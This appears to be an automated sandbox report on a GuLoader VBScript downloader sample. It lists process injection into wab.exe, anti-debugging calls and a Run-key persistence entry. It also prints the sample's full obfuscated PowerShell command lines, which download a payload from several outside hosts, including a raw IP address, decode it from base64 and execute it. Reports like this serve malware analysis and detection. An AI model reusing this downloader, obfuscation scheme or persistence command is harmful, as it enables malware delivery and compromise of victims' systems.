Malware Analysis Report

2024-10-18 23:08

Sample ID 240709-xka1ws1ekc
Target b13adc656bdc9a6425b6075e7f016debcea9cca87ccdc9faca337a03f31b4c79.vbs
SHA256 b13adc656bdc9a6425b6075e7f016debcea9cca87ccdc9faca337a03f31b4c79
Tags
guloader downloader persistence
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

b13adc656bdc9a6425b6075e7f016debcea9cca87ccdc9faca337a03f31b4c79

Threat Level: Known bad

The file b13adc656bdc9a6425b6075e7f016debcea9cca87ccdc9faca337a03f31b4c79.vbs was found to be: Known bad.

Malicious Activity Summary

guloader downloader persistence

Guloader,Cloudeye

Blocklisted process makes network request

Checks computer location settings

Adds Run key to start application

Suspicious use of NtCreateThreadExHideFromDebugger

Suspicious use of SetThreadContext

Suspicious use of NtSetInformationThreadHideFromDebugger

Enumerates physical storage devices

Program crash

Modifies registry key

Suspicious use of UnmapMainImage

Suspicious use of WriteProcessMemory

Suspicious behavior: MapViewOfSection

Suspicious use of AdjustPrivilegeToken

Suspicious use of SetWindowsHookEx

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-07-09 18:54

Signatures

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-07-09 18:54

Reported

2024-07-09 18:56

Platform

win10v2004-20240709-en

Max time kernel

150s

Max time network

151s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\b13adc656bdc9a6425b6075e7f016debcea9cca87ccdc9faca337a03f31b4c79.vbs"

Signatures

Guloader,Cloudeye

downloader guloader

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2650514177-1034912467-4025611726-1000\Control Panel\International\Geo\Nation C:\Windows\System32\WScript.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2650514177-1034912467-4025611726-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Algoritmiskes = "%Paginerende% -w 1 $elektronspillets=(Get-ItemProperty -Path 'HKCU:\\Coindication\\').Fyrsvamp;%Paginerende% ($elektronspillets)" C:\Windows\SysWOW64\reg.exe N/A

Suspicious use of NtCreateThreadExHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 3592 set thread context of 4100 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 4100 set thread context of 2904 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe
PID 4100 set thread context of 3272 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe
PID 4100 set thread context of 400 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe
PID 4100 set thread context of 4264 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe
PID 4100 set thread context of 5116 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe
PID 4100 set thread context of 1352 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe
PID 4100 set thread context of 2844 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe
PID 4100 set thread context of 4252 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe
PID 4100 set thread context of 3348 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe
PID 4100 set thread context of 2428 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe
PID 4100 set thread context of 2008 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe
PID 4100 set thread context of 4348 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe
PID 4100 set thread context of 1008 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe
PID 4100 set thread context of 4692 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe
PID 4100 set thread context of 4660 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe
PID 4100 set thread context of 4648 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe
PID 4100 set thread context of 1228 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe
PID 4100 set thread context of 1088 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe
PID 4100 set thread context of 4556 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe
PID 4100 set thread context of 2804 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe
PID 4100 set thread context of 2104 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe
PID 4100 set thread context of 1700 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe
PID 4100 set thread context of 1556 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe
PID 4100 set thread context of 1680 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe
PID 4100 set thread context of 3292 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe
PID 4100 set thread context of 2260 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe
PID 4100 set thread context of 3340 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe
PID 4100 set thread context of 2436 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe
PID 4100 set thread context of 2696 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe
PID 4100 set thread context of 3932 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe

Enumerates physical storage devices

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Program Files (x86)\windows mail\wab.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Program Files (x86)\windows mail\wab.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Program Files (x86)\windows mail\wab.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Program Files (x86)\windows mail\wab.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Program Files (x86)\windows mail\wab.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Program Files (x86)\windows mail\wab.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Program Files (x86)\windows mail\wab.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Program Files (x86)\windows mail\wab.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Program Files (x86)\windows mail\wab.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Program Files (x86)\windows mail\wab.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Program Files (x86)\windows mail\wab.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Program Files (x86)\windows mail\wab.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Program Files (x86)\windows mail\wab.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Program Files (x86)\windows mail\wab.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Program Files (x86)\windows mail\wab.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Program Files (x86)\windows mail\wab.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Program Files (x86)\windows mail\wab.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Program Files (x86)\windows mail\wab.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Program Files (x86)\windows mail\wab.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Program Files (x86)\windows mail\wab.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Program Files (x86)\windows mail\wab.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Program Files (x86)\windows mail\wab.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Program Files (x86)\windows mail\wab.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Program Files (x86)\windows mail\wab.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Program Files (x86)\windows mail\wab.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Program Files (x86)\windows mail\wab.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Program Files (x86)\windows mail\wab.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Program Files (x86)\windows mail\wab.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Program Files (x86)\windows mail\wab.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Program Files (x86)\windows mail\wab.exe

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\reg.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A

Suspicious use of UnmapMainImage

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1300 wrote to memory of 3824 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1300 wrote to memory of 3824 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3824 wrote to memory of 4756 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 3824 wrote to memory of 4756 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 3824 wrote to memory of 3592 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 3824 wrote to memory of 3592 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 3824 wrote to memory of 3592 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 3592 wrote to memory of 4972 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 3592 wrote to memory of 4972 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 3592 wrote to memory of 4972 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 3592 wrote to memory of 4100 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 3592 wrote to memory of 4100 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 3592 wrote to memory of 4100 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 3592 wrote to memory of 4100 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 3592 wrote to memory of 4100 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 4100 wrote to memory of 1624 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Windows\SysWOW64\cmd.exe
PID 4100 wrote to memory of 1624 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Windows\SysWOW64\cmd.exe
PID 4100 wrote to memory of 1624 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Windows\SysWOW64\cmd.exe
PID 1624 wrote to memory of 4352 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 1624 wrote to memory of 4352 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 1624 wrote to memory of 4352 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 4100 wrote to memory of 2904 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe
PID 4100 wrote to memory of 2904 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe
PID 4100 wrote to memory of 2904 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe
PID 4100 wrote to memory of 2904 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe
PID 4100 wrote to memory of 3272 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe
PID 4100 wrote to memory of 3272 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe
PID 4100 wrote to memory of 3272 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe
PID 4100 wrote to memory of 3272 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe
PID 4100 wrote to memory of 400 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe
PID 4100 wrote to memory of 400 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe
PID 4100 wrote to memory of 400 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe
PID 4100 wrote to memory of 400 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe
PID 4100 wrote to memory of 4264 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe
PID 4100 wrote to memory of 4264 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe
PID 4100 wrote to memory of 4264 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe
PID 4100 wrote to memory of 4264 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe
PID 4100 wrote to memory of 5116 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe
PID 4100 wrote to memory of 5116 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe
PID 4100 wrote to memory of 5116 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe
PID 4100 wrote to memory of 5116 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe
PID 4100 wrote to memory of 1352 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe
PID 4100 wrote to memory of 1352 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe
PID 4100 wrote to memory of 1352 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe
PID 4100 wrote to memory of 1352 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe
PID 4100 wrote to memory of 2844 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe
PID 4100 wrote to memory of 2844 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe
PID 4100 wrote to memory of 2844 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe
PID 4100 wrote to memory of 2844 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe
PID 4100 wrote to memory of 4252 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe
PID 4100 wrote to memory of 4252 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe
PID 4100 wrote to memory of 4252 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe
PID 4100 wrote to memory of 4252 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe
PID 4100 wrote to memory of 3348 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe
PID 4100 wrote to memory of 3348 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe
PID 4100 wrote to memory of 3348 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe
PID 4100 wrote to memory of 3348 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe
PID 4100 wrote to memory of 2428 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe
PID 4100 wrote to memory of 2428 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe
PID 4100 wrote to memory of 2428 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe
PID 4100 wrote to memory of 2428 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe
PID 4100 wrote to memory of 2008 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe
PID 4100 wrote to memory of 2008 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe
PID 4100 wrote to memory of 2008 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\b13adc656bdc9a6425b6075e7f016debcea9cca87ccdc9faca337a03f31b4c79.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Dissatisfying Kvatorialguineaneren Unhermitically Otariine Stormhat Revelationer Trykpladers68 Nederdrgtigeres Hmostaseomraadet kontorpersonalernes Turistbussernes Taktnxr Kommaregel Asylsager208 Torchlike Korrektiv Dubbo Dagfinn Tudekopper Tabooing nonmarriageable lokaliseringsprincippernes Micromhos Ledelsessystems Dissatisfying Kvatorialguineaneren Unhermitically Otariine Stormhat Revelationer Trykpladers68 Nederdrgtigeres Hmostaseomraadet kontorpersonalernes Turistbussernes Taktnxr Kommaregel Asylsager208 Torchlike Korrektiv Dubbo Dagfinn Tudekopper Tabooing nonmarriageable lokaliseringsprincippernes Micromhos Ledelsessystems';If (${host}.CurrentCulture) {$Dominator++;}Function Swatheable($Ethography){$Etagevaskens=$Ethography.Length-$Dominator;$Aseismic='SUBsTR';$Aseismic+='ing';For( $Sluicing=1;$Sluicing -lt $Etagevaskens;$Sluicing+=2){$Dissatisfying+=$Ethography.$Aseismic.Invoke( $Sluicing, $Dominator);}$Dissatisfying;}function Overdaadiges($Writeup227){ . ($Eftersynkroniser) ($Writeup227);}$Riffelgangen=Swatheable 'BMAoUz.i,l l a,/E5 . 0K ( W iMn d.o,wRs N Tg p1.0 . 0 ;. WFi nB6 4S;, x 6A4B;, sr,v : 1.2.1 . 0g) BGLe c.ksoA/f2 0 1m0M0 1O0,1, FSiDrFeRf o x /K1 2U1T. 0R ';$Spaltedefinition=Swatheable 'PU s eOrS- ADg.eSn t. ';$Stormhat=Swatheable 'Ph t t p sN:T/s/Bm,o.v.i e s.mDaRc kBtAa.l kE. c oKm /RKSoOl oTnAiGaTl vSa,r e nA. eBm,zI>IhNtKt pns.: /,/FmKiElRaLnsa,cDeJs,.OcSo m,/CKDo lTo n,i a lVv aLr e,n .UeOm z > hUtPt p :A/./C1 0R3 .R1F9,5.. 2.3Y7,.C4 3H/ K o l o nBi.a,lSvFa rAeUnF.Se,mAz.> h tht.p s :./ /DfCi,rSsUt 4.lNoPc.k s mGiMtBh sA.Bc oI. u k,/HK.oMleo.nLiFa l vIa.rPefnM. eKm.z ';$Barskt=Swatheable '.>S ';$Eftersynkroniser=Swatheable ' iSeOx. 
';$Hyperpolysyllabically='Nederdrgtigeres';$Direktrstols = Swatheable 'Be,c h,o %DaJpvp dOaHtPaP%.\,CSo q u,e l.uVc,h e 1,4S.Mm,y xL V&S& Re.c hDo FtE ';Overdaadiges (Swatheable 'H$ g lHoNbtavl,:KDLozgVw o o d =H(,c m d, /.cH $ DEiKrPe.kItDr.s,t oTl s )A ');Overdaadiges (Swatheable ' $ g.l o bSa.lP: O,t.aUrRiIi.n eM= $DS tLoUr mHh a.tM.Js p lBiHt (S$ B a r sSk t )L ');Overdaadiges (Swatheable 'P[ NBe t . S.e rSv.iUc e PIo iBn.tFM aDn.a g eRr ]P: :BS,eEcNu r iItmyFP rUoWtBo cPoUl .=S [SN,eIt .HS eAcPuUriiAtAyFPKr oHthoPcSoDl T.y p eM]k: :,TSlGsA1,2a ');$Stormhat=$Otariine[0];$Maintainable= (Swatheable 'l$sgOl.oFbaaKlL:.G e nfn.eUmMsAn iEt.sPtSa lPsB=RNAe,wP-,ORbIj,eSc t NS y s,t.eHm . N eHt . W,eSb.C,l iSe n t');$Maintainable+=$Dogwood[1];Overdaadiges ($Maintainable);Overdaadiges (Swatheable 'B$ G eAn nAe m.s n i tVsSt acl.s..,HDeMa d,e,rms [ $ S p.a.lSt.e d e fCiCn i t,i,o n ].=,$SR,iMf.fDe l g.aSn gJeOnB ');$Uddunstningen=Swatheable 'A$.G e n,n e mBsTnci tBsGt,aLl s..MD,oAw nMl,oGa d FDihlFe ( $ SHtBo r m hVaAtK, $ l,o kBaTlOi sDe rPi nMgPsUpar,iMn c i pSpHe,r.nEe sD) ';$lokaliseringsprincippernes=$Dogwood[0];Overdaadiges (Swatheable ' $Cg l oSb.aIl.:URAeInMgBuOeSrMa = (ST e s tF- PSaAt hW U$BlRoSkNa.l.iDsAeMr i,n g.s p.rNi n cSirpbpAeBr.nAe s )C ');while (!$Renguera) {Overdaadiges (Swatheable '.$ gIl o bAaFlS:ML.uKf.t e nEs,=O$ t rOu.e, ') ;Overdaadiges $Uddunstningen;Overdaadiges (Swatheable ',S,tna.rPtH-US lre eTpC .4. ');Overdaadiges (Swatheable 'R$Wg l.oSb akl :SR eDn.gPu eCr,a = (LT,eUs tD-EP.aStNh B$ l o kSaul,iTs,e r i nPgSsTp r ibn cBi.pPpAe.r nSe,s,)U ') ;Overdaadiges (Swatheable ',$Sgal oObFa.lM:FU,nShBeGrUmCistDi cCa.l.lSyP= $,g lVo bRaKl,:,KRv a tDoirAi abl gFuAi nfeUaBn e,rKe n + +P%N$OO t.aTrMi i n,eD. c oSuPnLtV ') ;$Stormhat=$Otariine[$Unhermitically];}$Agnellis=370878;$Underprikket=26015;Overdaadiges (Swatheable '.$TgEl.oAbEa l :AHSmUo,sStHa sAepoTmMr a a dPe.tA F=. 
AG eIt.-.CFo n tFe n,tB R$Sl o,kAaIl,iTs e rKiSnAgSs pnr,iWn,c.iMp pKeIr nTefsB ');Overdaadiges (Swatheable 'p$KgSl o b,aAl.:IT,eFlTeMsscCoTpUiBn gD H=I ,[,S yDs,t e,m .FC o nTv e.rUt,] :O: F r.o.mTB abs e.6U4 S t,r.i n g (Q$ HDmSoSs tAa.s e.oKmUr.aTaKd e.tS), ');Overdaadiges (Swatheable '.$.gbl o b.aBlU: TLa k tVn x rN =, ,[dS,y,sDtVetm.. TSeBx tS.IE nAcUo dCi nLg ] :D:LA.SrC.I,IM.NG eLt SKtIrCiRn g (K$CTAe l e s.c,oPpLi,nfg )H ');Overdaadiges (Swatheable 'D$,gClSo bAaMlO: S.tAuTb s = $,T,a,kUt.n,xTr . sDumb sUt,r.i.n.g,(P$DAAgTnIe lAlNi.s ,f$TUFnld e rBpFr iAk kSeYtS)S ');Overdaadiges $Stubs;"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Coqueluche14.myx && echo t"

C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Dissatisfying Kvatorialguineaneren Unhermitically Otariine Stormhat Revelationer Trykpladers68 Nederdrgtigeres Hmostaseomraadet kontorpersonalernes Turistbussernes Taktnxr Kommaregel Asylsager208 Torchlike Korrektiv Dubbo Dagfinn Tudekopper Tabooing nonmarriageable lokaliseringsprincippernes Micromhos Ledelsessystems Dissatisfying Kvatorialguineaneren Unhermitically Otariine Stormhat Revelationer Trykpladers68 Nederdrgtigeres Hmostaseomraadet kontorpersonalernes Turistbussernes Taktnxr Kommaregel Asylsager208 Torchlike Korrektiv Dubbo Dagfinn Tudekopper Tabooing nonmarriageable lokaliseringsprincippernes Micromhos Ledelsessystems';If (${host}.CurrentCulture) {$Dominator++;}Function Swatheable($Ethography){$Etagevaskens=$Ethography.Length-$Dominator;$Aseismic='SUBsTR';$Aseismic+='ing';For( $Sluicing=1;$Sluicing -lt $Etagevaskens;$Sluicing+=2){$Dissatisfying+=$Ethography.$Aseismic.Invoke( $Sluicing, $Dominator);}$Dissatisfying;}function Overdaadiges($Writeup227){ . ($Eftersynkroniser) ($Writeup227);}$Riffelgangen=Swatheable 'BMAoUz.i,l l a,/E5 . 0K ( W iMn d.o,wRs N Tg p1.0 . 0 ;. WFi nB6 4S;, x 6A4B;, sr,v : 1.2.1 . 0g) BGLe c.ksoA/f2 0 1m0M0 1O0,1, FSiDrFeRf o x /K1 2U1T. 0R ';$Spaltedefinition=Swatheable 'PU s eOrS- ADg.eSn t. ';$Stormhat=Swatheable 'Ph t t p sN:T/s/Bm,o.v.i e s.mDaRc kBtAa.l kE. c oKm /RKSoOl oTnAiGaTl vSa,r e nA. eBm,zI>IhNtKt pns.: /,/FmKiElRaLnsa,cDeJs,.OcSo m,/CKDo lTo n,i a lVv aLr e,n .UeOm z > hUtPt p :A/./C1 0R3 .R1F9,5.. 2.3Y7,.C4 3H/ K o l o nBi.a,lSvFa rAeUnF.Se,mAz.> h tht.p s :./ /DfCi,rSsUt 4.lNoPc.k s mGiMtBh sA.Bc oI. 